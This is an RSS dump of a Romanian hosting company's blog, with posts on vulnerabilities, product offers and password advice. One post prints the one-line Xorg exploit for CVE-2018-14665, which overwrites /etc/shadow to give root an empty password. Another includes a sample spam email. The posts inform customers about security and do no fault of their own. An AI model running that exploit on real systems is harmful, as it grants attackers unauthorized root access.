Blog CAMSCAPE https://www.camscape.ro Canal RSS feeds - blog CAMSCAPE Activate Windows https://www.camscape.ro/compania/blog/activate-windows Fri, 09 Nov 2018 00:10:55 +0200 Daca primiti mesajul "Activate Windows":

Activate Windows

stati linistiti, nu e nici o problema cu licenta voastra (in cazul in care chiar e achizitionata legal, bineinteles).

Pe 8 Noiembrie 2018, Microsoft anunta un bug al serverelor sale de autentificare si la momentul acesta singura solutie este dezinstalarea Windows 10 PRO si instalarea Windows 10 Home. Vezi mai multe aici: https://answers.microsoft.com/en-us/windows/forum/all/windows-suddenly-deactivated/fe9a4ecf-2e2a-491d-a43e-b010c316d1c4?auth=1

Bineinteles, asta nu este o solutie viabila si Microsoft promite o rezolvare in cateva zile. Pana atunci, ignorati mesajul. Doar 2-3 zile de acum.

]]>
Vulnerabilitate X.org https://www.camscape.ro/compania/blog/vulnerabilitate-xorg Sat, 27 Oct 2018 00:15:16 +0300 O vulnerabilitate a popularului mediu grafic bazat pe X.org al sistemelor de operare Linux a fost descoperita si remediata: https://lists.x.org/archives/xorg-announce/2018-October/002927.html

Denumita ca CVE-2018-14665, vulnerabilitatea permite ca prin executia a numai 3 comenzi simple, orice utilizator poate deveni root:

cd /etc; Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1;su

In comanda de mai sus, un utilizator cu drepturi limitate suprascrie /etc/shadow cu un fisier in care utilizatorul root nu are parola.

Vulnerabilitatea CVE-2018-14665 afecteaza in principal OpenBSD, dar si sisteme RedHat, Ubuntu si Centos, toti acestia avand deja patch-uri disponibile, deci va recomandam update-ul de urgenta.

Serverele camscape NU sunt afectate in nici un fel de aceasta vulnerabilitate. Serverele camscape nici macar nu au mediul grafic activat pentru o optimizare deplina a resurselor.

websuser@robuhvm101:/ # cd /etc; Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1;su
 
Fatal server error:
The '-logfile' option can only be used by root.
 
Please consult the The X.Org Foundation support
         at http://wiki.x.org
 for help.
 
Password:
su: Authentication failure
websuser@robuhvm101:/etc #

 

]]>
Web Application Firewall (WAF) de la Malware Expert https://www.camscape.ro/compania/blog/web-application-firewall-waf-de-la-malware-expert Wed, 24 Oct 2018 12:28:52 +0300 Web Application Firewall (WAF) de la Malware Expert

camscape este reseller al Malware Expert, dupa cum puteti observa aici https://malware.expert/partners-and-vendors/

Malware Expert ( https://malware.expert ) este un producator de reguli de Web Application Firewall (WAF) bazat pe ModSecurity ( http://www.modsecurity.org ).

Furnizorii de servicii de gazduire sufera zilnic consecintele multiplelor vulnerabilitati de securitate gasite in CMS-urile utilizate in mod obisnuit, cum ar fi WordPress, Drupal si Joomla, dar si pentru aplicatii web custom.

Malware Expert ofera protectie impotriva unor astfel de atacuri de tip malware si netbot, chiar inainte ca clientii sa aplice patch-uri de securitate pe respectivele CMS-urile lor si deci inainte ca site-ul lor sa fie hacked, pastrand in acelasi timp functionalitatea site-ului. Nivelul de false positive este minim.

Regulile Web Application Firewall (WAF) sunt dezvoltate de Malware Expert incepand cu 2005 si acum protejeaza peste 10.000 de site-uri, acoperind peste 99,9% din atacurile generice.

Costul activarii WAF Malware Expert este de doar 5,00 EUR/luna . Implementarea este bineinteles GRATUITA pe serverele aflate in mentenanta camscape.

Conform cerintelor GDPR, aici https://malware.expert/privacy-notice/ puteti parcurge politica de confidentialitate a Malware Expert.

 

 

]]>
IMWORLD 2018 https://www.camscape.ro/compania/blog/imworld-2018 Sun, 07 Oct 2018 00:28:34 +0300 Intre 3 si 4 octombrie 2018, echipa camscape a participat din nou la evenimentul anual IMWORLD (https://www.imworld.ro). Si de aceasta data atat ca suport tehnic cat si ca expozanti.

Dupa toate intalnirile avute, unele de succes, va aratam doar doua poze, inainte si dupa eveniment:

IMWORLD 2018 Camscape

 

IMWORLD 2018 Camscape

]]>
Update la Windows 10 1809 va poate sterge documentele https://www.camscape.ro/compania/blog/update-la-windows-10-1809-va-poate-sterge-documentele Sat, 06 Oct 2018 20:48:51 +0300 In 02 Octombrie 2018, Microsoft a lansat noua varianta Windows 10 versiune 1809.

Pe langa cateva, oarecum neimportante, schimbari, aduce o problema foarte grava si anume stergerea profilului utilizatorului si implicit a diverse documente pe care acesta le are salvate in profil. 

Microsoft a aflat de problema azi 06 Octombrie 2018 si a oprit temporar update-ul: https://support.microsoft.com/en-us/help/4464619/windows-10-update-history

Vestea buna este ca update-ul nu a fost inca fortat ci a afectat doar pe cei care au verificat manual update-ul. Inca o veste buna este ca exista si o rezolvare pentru preventie: modificati setarea din 

Computer Configuration/Administrative Templates/System/User Profiles/Delete user profiles older than a specified number of days on system restart

din "Not configured" in "Disabled" . Practic exact aceasta este bug-ul introdus de catre update, schimbarea default-ului acestei setari din Disabled in Enabled la 24 ore, ceea ce duce la stergerea profilului oricarui utilizator.

Vestea proasta este ca este extrem de simplu de implementat pe un Active Directory, dar foarte compilcat acolo unde nu exista un Active Directory sau este vorba de sisteme personale instalate cu Windows Home.

Cel mai sigur este ca pentru moment sa amanati trecerea la noua varianta.

 

]]>
SEO pe Instagram https://www.camscape.ro/compania/blog/seo-pe-instagram Sun, 23 Sep 2018 15:15:13 +0300 Social Marketing este ceva vechi si o vreme insemna doar Facebook. Dar in ultima vreme inseamna din ce in ce mai mult Instagram.

Dar cum sa faci un post de succes pe Instagram. Iata cateva sugestii:

Noul algoritm Instagram favorizeaza posturile cu implicare mare, astfel ca atunci cand un post primeste o multime de like-uri si comentarii, acest lucru indica algoritmului faptul ca este vorba de continut de inalta calitate pe care alti utilizatori ar dori să il vada.
 
 
Folositi-va de cele 5 simturi:
 
  • Descrieti cum arata locul, lumina si culorile lucrurilor pe care le puteti vedea in imagine.
  • Descrieti sunetul.
  • Descrieti vremea si temperatura.
  • Descrieti mirosul.
  • Descrieti gustul.
 
Povestea e importanta.
 
  • Ce este asta?
  • Cand s-a intamplat?
  • Unde este?
  • De ce arati asta? De ce s-a intamplat asta?
  • Cine este personajul principal al povestii?
  • Cum ai ajuns acolo? Cum s-a intamplat?
 
 
Rezolvati problemele audientei
 
Identificati o problema comuna in afacerea sau industria dvs. si imaginati-va cum poate fi rezolvata această problema. Dati-le solutia. Apoi, construiti o propozitie care mentionează aceste trei puncte-cheie.
 
 
Utilizati hashtag-urile potrivite
 
Hashtag-urile sunt extrem de importante pe Instagram si ar trebui sa fie utilizate la fiecare post pentru a creste audienta. Alegeti 10-15 hashtag-uri relevante pentru a le include intr-un post. Nu utilizati hashtaguri populare. Utilizand hashtag-uri generale, nu va aratati fotografia pe niciuna dintre tagurile hashtag.
 
De fiecare data cand va ganditi sa adaugati un hashtag, intrebati-va: "Este acest hashtag NUMAI folosit de publicul meu tinta sau de alte persoane pe Instagram?"
DA: adaugati hashtag-ul. NU: nu adaugati hashtag-ul.
 
 
Reteta pentru posturi grozave pe Instagram si continut de inalta calitate:
 
  • 1 imagine frumoasa
  • 2 picaturi de creativitate
  • 1 gram de inspiratie
  • 1 kilogram de originalitate
  • Cateva cuvinte
 
 
IMPORTANT: post-ul acesta este (mai mult decat) inspirat de un Spam pe care l-am primit. Avand in vedere ca e un spam, mi se pare normal sa ne insusim textul si sa nu mentionam si sursa originala. Dar ideile sunt bune.
 
]]>
Ce parola sa imi pun https://www.camscape.ro/compania/blog/ce-parola-sa-imi-pun Sun, 29 Jul 2018 22:54:17 +0300 Setarea unei parole ar trebui sa fie ceva simplu si normal. Totusi, se fac multe alegeri gresite si mai devreme sau mai tarziu apar si efectele neplacute.

Varianta scurta:

  • o parola trebuie sa fie lunga (sa aiba multe caractere), sa contina litere mari, litere mici, cifre si chiar si semne
  • o parola nu trebuie refolosita. Daca o folositi intr-un loc, pe un site, pe calculator, nu o refolositi pe alt site
  • o parola trebuie schimbata la un interval regulat, de preferat cu o alta parola, fara legatura cu cea anterioara

In plus, de pe serverele operate de camscape, pentru serviciile aflate in mentenanta noastra (conturi email, conturi FTP, conturi Active Directory, conturi MySQL sau PostgreSQL, etc), parolele NU pot fi citite. Parolele acestor conturi se pastreaza exclusiv criptat, nici administratorii sistemelor nu le pot citi.

Deasemenea, pe serverele camscape si pe serviciile aflate in mentenanta noastra (conturi email, conturi Active Directory, etc), implementam, de comun acord cu clientii nostri politici de expirare a parolei, reducand astfel impactul unui brute-force attack.

 

Varianta lunga, si va recomand sa cititi:

Complexitatea parolei

O parola trebuie sa fie complicata, greu de ghicit. Nu trebuie sa fie numele dvs, nu trebuie sa fie data nasterii si nici combinatii intre ele. De ce? Pentru ca exista un tip de atac care se cheama brute-force attack si care presupune incercarea rapida a diverselor cuvinte din dictionar sau in combinatie cu contul la care aceasta parola este atasata.

De exemplu, contul office@domeniumeu.ro NU trebuie sa aiba parola office123 . Timpul de ghicire a unei astfel de parole este de cateva secunde.

Mai precis, o parola pentru a fi conforma cu standardele din ziua de azi trebuie sa indeplineasca concomitent cerintele:

  • minim 14 caractere (da, ati citit bine)
  • cifre, litere mici, litere mari si semne

Problema apare in memorarea parolei complicate si NU este o idee buna notarea acesteia pe un biletel atasat de monitor.

In sensul acesta, in 2011, un comic publicat pe XKCD https://xkcd.com/936/ a revolutionat intreaga gandire a generarii de parole. Exista diverse comentarii pe aceasta tema, comentarii care ajung la matematica si nu sunt pentru cei slabi de inima: https://security.stackexchange.com/questions/6095/xkcd-936-short-complex-password-or-long-dictionary-passphrase .

XKCD 936 Password Strength Example

 

Dar pe scurt e asa:

  • nu va chinuiti cu Tr0ubad0ur! . Incercati mai curand cu eumaduclasalainfiecaremartila16:30 (asta e o idee a unui client camscape) . A doua este mult mai puternica
  • nu puneti nici cuvinte pur si simplu. maria mulge vaca are are cam aceeasi complexitate ca si mamuva, adica foarte mica. Dar daca puneti niste semne in loc de pauzele din maria mulge vaca , atunci complexitatea e mare.

Tot in sensul acesta, camscape a dezvoltat un generator de parole https://ceipam.eu/password.php . Este bazat pe baza de date DEX, dati refresh pana va convine. Dar, inca odata, copiati ideea, nu exact parola.

 

Refolosirea parolei

De la YAHOO au fost sparte 500 milioane de conturi, dupa care s-a constatat 1,5miliarde de conturi, dupa care s-a dat verdictul "toate". De la Linkedin 300 milioane. Si lista continua cu alte site-uri super vizitate. Si totusi, multi oameni au aceeasi parola si la Yahoo, si pe Linkedin, si pe mailul de la birou.

Pentru acest motiv a fost construit site-ul https://haveibeenpwned.com/ . Va puteti verifica adresa email si puteti afla daca ea impreuna cu parola asociata pe diverse site-uri este cunoscuta si de alte persoane inafara de dvs. Daca raspunsul verificarii pe site-ul mentionat este PAWNED! pentru adresa email contultau@domeniultau.ro , NU inseamna ca cineva stie parola acestui cont email. Inseamna insa ca exista undeva (si va da detalii) un site pe care ati introdus adresa email contultau@domeniultau.ro cu o anumita parola, iar aceasta combinatie este cunoscuta. Daca aceasta combinatie ati folosit-o si la ceva de care va pasa (contul email de la birou de exemplu), atunci e grav.

Luati in calcul si ca bazele de date cu parole si conturi cunoscute furate de pe site-urile mentionate in site-ul https://haveibeenpwned.com/ sunt vandute in mod curent pe TOR cu 50-100 USD. Adica nu putini hackeri cunosc aceste parole ale dvs.

Asa ca daca cumva primiti un mesaj in care vi se spune ca cineva va stie parola si va cere diverse plati, in site-ul sus mentionat puteti verifica de unde anume va stie parola. Si schimbati-o. Rapid.

Pe viitor, niciodata sa nu mai folositi aceeasi parola pe mai multe conturi. Eventual alegeti urmatoarea varianta:

  • separati conturile in conturi critice (emailul de la birou, contul Active Directory, banci, etc) si non critice (contul de la comanda catering de exemplu)
  • pentru conturile critice, setati parole complexe, diferite de la un cont la altul
  • pentru conturile non critice, setati aceeasi parola peste tot, simpla, usor de tinut minte

 

Schimbarea parolei la un anumit interval

Aceasta este o politica de securitate care nu trebuie sa lipseasca din nici o companie pentru conturile de email, conturile de Active Directory sau alte conturi. Si totusi putini o implementeaza.

Avantajele sunt cel putin doua:

  • o protectie suplimentara in fata brute-force attack
  • expirarea automata a conturilor pe care HR-ul a "uitat" sa le comunice ca disabled

 

 

 

]]>
HTTPS Obligatoriu https://www.camscape.ro/compania/blog/https-obligatoriu Sat, 30 Jun 2018 10:24:47 +0300 De ceva vreme Google ne impinge pe toti la trecerea site-urilor pe HTTPS.

Incepand cu Iulie 2018, odata cu lansare Google Chrome 68, orice site fara HTTP va fi afisat ca Insecure conform Blog-ului Google: https://security.googleblog.com/2018/02/a-secure-web-is-here-to-stay.html

Astfel, noul browser va arata asa orice site fara certificat HTTPS:

Google Chrome 68 HTTP is Insecure

Nu indepartati vizitatorii de site-ul dvs. Va putem oferi certificate HTTPS la preturi competitive, putem implementa chiar si certificate gratuite Letsencrypt si avem si scripturi automatizate de supraveghere a expirarii, de alarmare si chiar de reinoire automata.

 

]]>
Atac Spam sustinut https://www.camscape.ro/compania/blog/atac-spam-sustinut Mon, 25 Jun 2018 07:53:11 +0300 Incepand cu 23 Iunie 2018, un nou val de spam a fost observat pe serverele administrate de camscape, spam cu scopul de a infecta clientii care fac imprudenta de a urmari linkul propus.

Ce este deosebit de aceasta data e ca mesajele par perfect legitime, au SPF setat, DKIM perfect, contin numai text si chiar si acela atat de variat incat o regula anti spam pe el este dificil de implementat. Motivatia este destul de simpla: mesajele sunt trimise de pe servere legitime, dar infectate. Un exemplu mai jos.

Totusi, incepand cu 25 Iunie 2018, un nou set de reguli anti spam a fost implementat cu succes pe serverele administrate de camscape, atat la nivel anti spam cat si pe Spamtrap pentru a bloca si retine in blocaj IP-urile serverelor infectate.

Va rugam sa ne atentionati de fiecare data cand observati astfel de atacuri care nu se rezuma la un simplu spam ratacit. Nu urmariti orice link primit prin email, nu accesati linkuri care nu au legatura cu domeniul celui care a trimis mesajul.

 

Received: from server.dailynews2u.com (43.252.212.125)
  by mail.camscape.ro with ESMTPS (DHE-RSA-AES256-GCM-SHA384 encrypted); 24 Jun 2018 06:38:27 -0000
Received-SPF: pass (mail.camscape.ro: SPF record at thumb.com.my designates 43.252.212.125 as permitted sender)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
	d=thumb.com.my; s=default; h=To:Date:Message-Id:Subject:Mime-Version:
	Content-Type:Content-Transfer-Encoding:From:Sender:Reply-To:Cc:Content-ID:
	Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc
	:Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe:
	List-Subscribe:List-Post:List-Owner:List-Archive;
	bh=s/sTOCbF2hqNZLQEu7Q2oPjH//F7Jq1SSZVnIdP5tWI=; b=VfTdO/ja0pJXuksA9t7QHT+NMi
	i7xs7FuHXcxK+mVG25CpOxFJaw1P9U4w+LMwMBWXgB/FBKwCj2uyb1QR+LN+DnF7WlzCTGQuig22X
	a1y4KbRH0QDAMAA2tLUUvMvQ8GfNm318PlmY+EiguX0mH1Vd1fyz0KAZALyZS7SUjqy0=;
Received: from [200.23.230.38] (port=32769 helo=[127.0.0.1])
	by server.dailynews2u.com with esmtpsa (TLSv1:ECDHE-RSA-AES256-SHA:256)
	(Exim 4.91)
	(envelope-from <steven@thumb.com.my>)
	id 1fWydw-0005oK-Bj; Sun, 24 Jun 2018 14:37:01 +0800
From: steven@thumb.com.my
Content-Transfer-Encoding: base64
Content-Type: text/plain; charset=UTF-8
Mime-Version: 1.0 (1.0)
Subject: Henriette
Message-Id: <68EC8D4F-A4EB-6B79-B84A-49CFDF26C364@thumb.com.my>
Date: Sun, 24 Jun 2018 08:37:00 +0200

Hey, my future inamorato!
A pleasant cutie needs the assistance of a real gentleman.
I stay alone in my apartment and have problems with my Jacuzzi.
Admire pics of it and, of course, some my nudes 


example_link://somedomain.com/ms4lfszc/lzod1mr3d.php?c2VydmljZUBjYW1zY2FwZS5ybw==
]]>
DOT Cloud Active Directory https://www.camscape.ro/compania/blog/dot-cloud-active-directory Tue, 12 Jun 2018 23:41:15 +0300 Active Directory inseamna mult mai mult decat stocare de fisiere si chiar decat useri cu drepturi diferite de acces. Active Directory inseamna securitate si management centralizat al statiilor de lucru, un aspect extrem de important in mediul IT.
 
Dar implementarea clasica on-premises, in interiorul retelei existente atrage cheltuieli semnificative. Pe langa unul sau mai multe servere performante, este nevoie de dulap de comunicatie, UPS, camera tehnica pentru asigurarea securitatii fizice, racire si altele. De multe ori, 1000 EUR pentru un server ajung sa se transforme in 3000 EUR pentru intreaga solutie, lucru greu de inclus in bugetele companiilor mici.
 
Dar pentru ca si companiile cu bugete mici sau cele cu spatiu mic de birouri au nevoie de Active Directory, camscape a proiectat DOT Cloud Active Directory.
 
DOT Cloud Active Directory este o solutie completa cu caracteristici evidente de securitate:
  • locatia datelor este in datacentere Tier3, deci protectia fizica este asigurata
  • locatia datelor este in Romania pentru o viteza cat mai mare de acces la datele stocate
  • sistemul este protejat cu un firewall performant
  • accesul se face numai prin canal VPN IPsec criptat conform standardelor actuale, folosind certificate si autentificare unica cu credentialele utilizatorului. Nu exista comunicatie necriptata cu sistemul
  • include stocare de fisiere, incepand de la 100GB spatiu, fara limita superioara
  • include management de utilizatori si grupuri
  • include drepturi de acces per director si per fisier, read-write sau read-only al utilizatorilor sau grupurilor
  • include politici de parola (expirare, lungime, complexitate)
  • include politici de securitate pentru protectia statiilor de lucru cu orice sistem de operare Microsoft Windows
  • numar nelimitat de utilizatori, nu exista o taxa per utilizator
  • dispozitive multiple (smartphone, notebook, tableta, statie de lucru) si sisteme de operare multiple (Microsoft Windows, Linux, IOS)
  • WPA Enterprise (802.1x, RADIUS) in reteaua locala cu autentificare din cloud
  • include optional backup off-site incremental zilnic
 
Avantaje principale ale DOT Cloud Active Directory fata de solutiile clasice Active Directory on-premises:
  • economia pe termen scurt prin transformarea investitiei initiale intr-o chirie lunara, incepand cu 99,00 EUR/luna + TVA
  • economia de spatiu fizic in birourile companiei
  • asigurarea protectiei fizice a datelor
 
Dezavantaje principale ale DOT Cloud Active Directory fata de solutiile clasice Active Directory on-premises:
  • viteza de acces depinde de tipul de conexiune la internet
Cloud Active Directory
 
]]>
Microsoft cumpara GitHub https://www.camscape.ro/compania/blog/microsoft-cumpara-github Tue, 05 Jun 2018 00:18:16 +0300 Intr-un blog de azi 04 Iunie 2018, Co-fondatorul GitHub, Chris Wanstrath anunta achizitia GitHub de catre Microsoft: https://blog.github.com/2018-06-04-github-microsoft/

Unul dintre cele mai cunoscute proiecte opensource, dedicat exclusiv opensource este astfel achizitionat de catre Microsoft pentru 7.5 Miliarde USD. Chris Wanstrath devine director in cadrul Microsoft. Microsoft, acelasi care a cumparat in 2016 CodePlex pentru a il inchide imediat aproape, nu inainte de a recomanda utilizatorilor folosirea .... GitHub.

Iar Chris Wanstrath are pseudonimul defunkt pe blogul sau. Sa insemne oare ca vom vedea o istorie asemanatoare cu MySQL cumparat de Oracle care a generat doua super produse Percona DB si Maria DB? Vom vedeam in maxim 2 ani.

 

]]>
GDPR : Data Protection Experts https://www.camscape.ro/compania/blog/gdpr-data-protection-experts Sun, 03 Jun 2018 22:36:42 +0300 GDPR a fost activat pe 25 mai 2018 si in aceeasi zi am fost invitati sa participam la o conferinta organizata de JURIDICE.ro ( https://www.juridice.ro ) prin Data Protection Experts ( https://www.dataprotectionexperts.ro ) pe tema implementarii GDPR in Romania.

In sala Alexandru Ioan Cuza a CCIR, conferinta organizata de Data Protection Experts a avut 300 de invitati (si 80 de cereri suplimentare refuzate). In fata acestora s-au prezentat 25 de experti reuniti de Data Protection Experts, printre care si noi, camscape.

Subliniem inca odata ca GDPR este pana la urma despre PROTECTIA datelor cu caracter personal si asta include in primul rand norme si metode IT, nu doar proceduri. Va invitam deci la discutii pe aceasta tema, suntem siguri ca va putem oferi solutii de securitate eficiente si la un raport calitate/pret excelent.

Puteti vedea aici interventia noastra:

Textul integral al conferintei il puteti accesa aici: https://www.youtube.com/watch?list=PLkvczt8a6IzWM23Y550zSsFj94vda0xx_&v=BAZA0B67r6o

Iar reactiile in presa nu au intarziat sa apara:

http://www.mediafax.ro/economic/experti-despre-gdpr-regulamentul-a-venit-peste-noi-fara-sa-ne-permita-sa-ne-punem-la-punct-cu-el-17230933

https://www.antena3.ro/actualitate/gdpr-anuntul-alarmant-al-specialistilor-470721.html

 

]]>
VPNFilter - Un atac informatic care a afectat 500.000 de echipamente https://www.camscape.ro/compania/blog/vpnfilter-un-atac-informatic-care-a-afectat-500000-de-echipamente Tue, 29 May 2018 10:26:00 +0300 Intr-un post publicat pe 23 Mai 2018, Talos, o companie de cybersecurity din grupul Cisco, anunta descoperirea unui atac malware care a infectat cel putin 500.000 de routere SoHo din intreaga lume: https://blog.talosintelligence.com/2018/05/VPNFilter.html
 
Se pare ca sursa atacului este o organizatie ruseasca cunoscuta ca FancyBear, Sofacy si alte denumiri.
 
Modalitatea de atac este prin folosirea unei vulnerabilitati Tomato (un server web folosit pe aceste routere pentru interfata de management). Evident, inseamna ca numai device-urile direct conectate la internet au fost afectate, unde direct conectat la internet poate insemna si un port forward.
 
Device-uri afectate:
 
Linksys: E1200, E2500, WRVS4400N
Mikrotik: 1016, 1036, 1072
Netgear: DGN2200, R6400, R7000, R8000, WNR1000, WNR2000
QNAP: TS251, TS439 Pro
TP-LINK: R600VPN
 
Daca device-ul dvs este in lista de mai sus, recomandarea este din pacate un reset to factory default si reconfigurarea echipamentului. Un simplu reboot nu rezolva decat o parte a problemei.
 
Interesant este ca FBI recomanda aplicarea acestui procedeu pe orice router SoHo, nu numai cele din lista: https://www.ic3.gov/media/2018/180525.aspx
 
Cu alte cuvinte, daca va simtiti nesiguri si daca datele dvs au oarecare importanta pentru dvs, ar fi bine sa securizati reteaua aplicand recomandarea de mai sus. Si in general, renuntati la port forward.
]]>
E-Fail : o vulnerabilitate PGP https://www.camscape.ro/compania/blog/e-fail-o-vulnerabilitate-pgp Tue, 29 May 2018 09:09:12 +0300 PGP (Pretty Good Privacy https://en.wikipedia.org/wiki/Pretty_Good_Privacy ) este un protocol vechi de 27 de ani care permite transmiterea mesajelor email criptate end-to-end . Si pentru alte criptari de altfel.

Adica, utilizatorul Mihai doreste sa trimita un mesaj criptat catre utilizatorul Ionel. Mihai are doua chei, una privata cu care poate decripta mesajul si una publica cu care cripteaza mesajul. Ionel, la fel, doua chei, publica si privata, diferite de cele ale lui Mihai. Mihai si Ionel isi trimit unul altuia cheile publice si isi pastreaza fiecare propriile chei private. Dupa asta, folosind pluginuri specifice fiecarui client email, mesajele dintre Mihai si Ionel vor fi criptate in asa fel incat numai detinatorii cheilor private vor putea citi mesajele.

Totul frumos timp de 27 de ani, cand, un grup de cercetatori a descoperit o bresa majora de securitate: https://www.eff.org/deeplinks/2018/05/not-so-pretty-what-you-need-know-about-e-fail-and-pgp-flaw-0 

De remarcat ca problema nu este a protocolului PGP ci a implementarilor acestuia la nivelul diverselor pluginuri din Mozilla Thunderbird, Apple Mail, Microsoft Outlook dar si din servicii cunoscute precum Signal. Aici de exemplu https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection-variant-2/ puteti vedea o demonstratie de hack pe mesajele criptate din Signal.

De mentionat ca aceasta vulnerabilitate nu este nici pe departe atat de grava cum este prezentata. Conditiile pe care un atacator trebuie sa le indeplineasca pentru a obtine acces la datele dvs sunt mult prea complicate si dependente de diverse ocazii improbabile pentru ca un atac sa reuseasca cu adevarat. Dar.... pe fondul GDPR totul devine mai fierbinte.

La momentul acestui articol, toate cele de mai sus au primit patch-uri de securitate, deci tot ce aveti de facut este un simplu update.

 

]]>
Hosting in UK https://www.camscape.ro/compania/blog/hosting-in-uk Tue, 08 May 2018 21:50:59 +0300 Hosting in UK pe masini virtuale sau servere dedicate.

Pe langa hosting-ul cunoscut operat de noi in datacenter-e din Romania si Germania, am lansat un nou serviciu care ofera hosting in UK, Londra. Singura masina virtuala creata pana acum in acest nou datacenter o puteti accesa la https://www.capital87.co.uk .

Hosting in UK reprezinta o solutie foarte buna pentru cei ce doresc prezenta web pe piata britanica. Conexiunile la Internet nu sunt de aceeasi capacitate ca in Romania si latenta conteaza enorm. Din acest motiv dar si pentru imaginea companiei dvs in fata clientilor sai, cat si pentru Google (SEO), va recomandam hostingul in UK pentru cazul in care aveti un potential de clienti britanici.

Oferta ramane neschimbata: Hosting VPS in UK . Pentru alte configuratii sau pentru servere dedicate, va rog sa ne contactati.

 

 

]]>
Vestitorii primaverii https://www.camscape.ro/compania/blog/vestitorii-primaverii Thu, 08 Mar 2018 12:57:07 +0200 Echipa Camscape ureaza tuturor femeilor "La multi ani si o primavara frumoasa!"

 

 

]]>
Meltdown si Spectre, doua vulnerabilitati extrem de grave https://www.camscape.ro/compania/blog/meltdown-si-spectre-doua-vulnerabilitati-extrem-de-grave Thu, 04 Jan 2018 17:55:10 +0200 Un an nou si vulnerabilitati noi. Grave.

Conform cu https://spectreattack.com/ , doua noi vulnerabilitati, Meltdown si Spectre, afecteaza orice sistem de operare pe aproape orice procesor modern Intel, AMD sau ARM. Vulnerabilitatile permit citirea de bucati de memorie care contin date importante (parole, informatii protejate). Un fel de Heartbleed dar nu remote.

Practic, Meltdown si Spectre au ca efect direct posibilitatea elevarii de drepturi. Principalul target ca volum sunt site-urile, unde userul serverului web ruland o aplicatie web care permite exploit-uri poate ajunge sa citeasca bucati de memorie apartinand root sau Administrator. Mai departe e destul de evident ce se intampla.

Singurele masini care nu sunt afectate sunt masinile virtuale care NU ruleaza sisteme OpenVZ, Docker si alte containere sau Xen. Cu alte cuvinte, sistemele de virtualizare camscape, ruland Linux KVM, NU sunt afectate.

Patch-urile pentru sistemele de operare Microsoft Windows si MacOS sunt deja disponibile, cel putin partial. Tot ce aveti de facut este sa va faceti update-urile la zi, si pe statiile de lucru si pe servere.

Pe sisteme de operare Linux insa este putin mai complicat. In primul rand exista doar un patch iar trecerea la includerea acestora in kernel este previzionata peste aproximativ 1 luna odata cu Kernel 4.16 . In plus, si cel mai grav, se estimeaza ca aplicarea patch-urilor va aduce o reducere a vitezei de functionare de pana la 50%.

 

]]>
Vulnerabilitate SSL ROBOT https://www.camscape.ro/compania/blog/vulnerabilitate-ssl-robot Thu, 14 Dec 2017 14:12:16 +0200 O vulnerabilitate in sistemul SSL de criptare a fost descoperita anunta https://robotattack.org/ .

Vulnerabilitatea numita ROBOT (Return Of Bleichenbacher's Oracle Threat) este o adaptare a unei vulnerabilitati vechi de 19 ani (!!!). In 1998, Daniel Bleichenbacher descoperea o problema in TLS atunci cand era folosita criptarea RSA.

ROBOT afecteaza in acest moment site-uri din TOP 100 precum si implementari Cisco, F5 si alti vendori cunoscuti. Accesati https://robotattack.org/ pentru a verifica vulnerabilitatea site-ului dvs sau pentru a verifica statusul routerelor afectate.

Serverele camscape NU sunt afectate de aceasta vulnerabilitate. In plus, in urmatorul ciclu de update vom renunta definitiv la cifrurile RSA pentru mai multa siguranta.

]]>
Securitatea conexiunii wireless https://www.camscape.ro/compania/blog/securitatea-conexiunii-wireless Mon, 16 Oct 2017 12:57:56 +0300 Cu totii cunoasteti protocolul WiFi WEP si cu totii il evitati fiindca este total nesigur. Dar iata ca si WPA2 poate fi decriptat extrem de usor. 

 

Astfel, potrivit unui studiu pe care il puteti citi aici https://www.krackattacks.com/ , WPA2 atat Personal cat si Enterprise poate fi decriptat atacand fie routerul wireless fie echipamentul (telefonul, placa de retea WiFi, etc).

 

Da, ati citit bine, functionarea wireless are 0 securitate in acest moment datorita atacului de tip Krackattack. Singura modalitate de remediere este prin update atat pentru access point/router cat si pentru clientul wireless. Iar aceste update-uri vin de la furnizor, moment in care se va vedea cat conteaza vendor-ul.

 

]]>
Vulnerabilitate Linux, Android si routere https://www.camscape.ro/compania/blog/vulnerabilitate-linux-android-si-routere Wed, 04 Oct 2017 19:55:57 +0300 Nu mai putin de 7 vulnerabilitati au fost descoperite in codul DNSMasq http://www.thekelleys.org.uk/dnsmasq/doc.html , dintre care 3 permit executia de cod remote. Adica sunt foarte grave.

 

Vulnerabilitatile (CVE2017-14491, CVE2017-14492, CVE2017-14493, CVE2017-14494, CVE2017-14495, CVE2017-14496, CVE2017-13704) afecteaza sistemele de operare Linux si Android, dar si implementarile de pe routerele SoHo si device-urile IoT. Este neclar la acest moment daca afecteaza si routere din gama Enterprise (Cisco, Fortinet, Juniper), asa ca ar fi bine sa verificati si aici cu producatorul.

 

Daca pe Linux si Android lucrurile se rezolva cat de cat prin update, pe routere si IoT lucrurile depind de un update de firmware disponibil de la producator (si aici se vede cat de mult conteaza compania de la care cumperi echipamente SoHo). Cu alte cuvinte, asteptati-va la un val de Spam in urmatoarele 1-2 luni sau macar la un DDoS de amploare.

 

Mai multe detalii gasiti aici, in blogul original Google: https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html

 

camscape NU foloseste DNSmasq pe niciunul dintre echipamentele Linux aflate in mentenanta, deci nu avem o problema cu aceasta vulnerabilitate. Pentru ceilalti, faceti update si faceti repede. Mai mult, avand in vedere ca patch-urile publicate nu rezolva definitiv toate CVE-urile, va recomand oprirea acestui serviciu si inlocuirea lui cu servicii echivalente.

 

]]>
IMWORLD 2017 https://www.camscape.ro/compania/blog/imworld-2017 Mon, 02 Oct 2017 10:36:56 +0300 #imworld

4-5 Octombrie 2017, INTERNET & MOBILE WORLD ROMANIA 2017

Asa cum v-am obisnuit deja, suntem si noi prezenti la acest eveniment de amploare.

Va asteptam si pe voi la IMWORLD 2017!

Standul nostru:  i15camscape

camscape imworld 2017

]]>
Optionsbleed, un fel de Heartbleed mai mic https://www.camscape.ro/compania/blog/optionsbleed-un-fel-de-heartbleed-mai-mic Wed, 20 Sep 2017 07:17:03 +0300 Optionsbleed sau CVE-2017-9798 https://nvd.nist.gov/vuln/detail/CVE-2017-9798 este o vulnerabilitate ce afecteaza orice versiune a webserverului Apache.

 

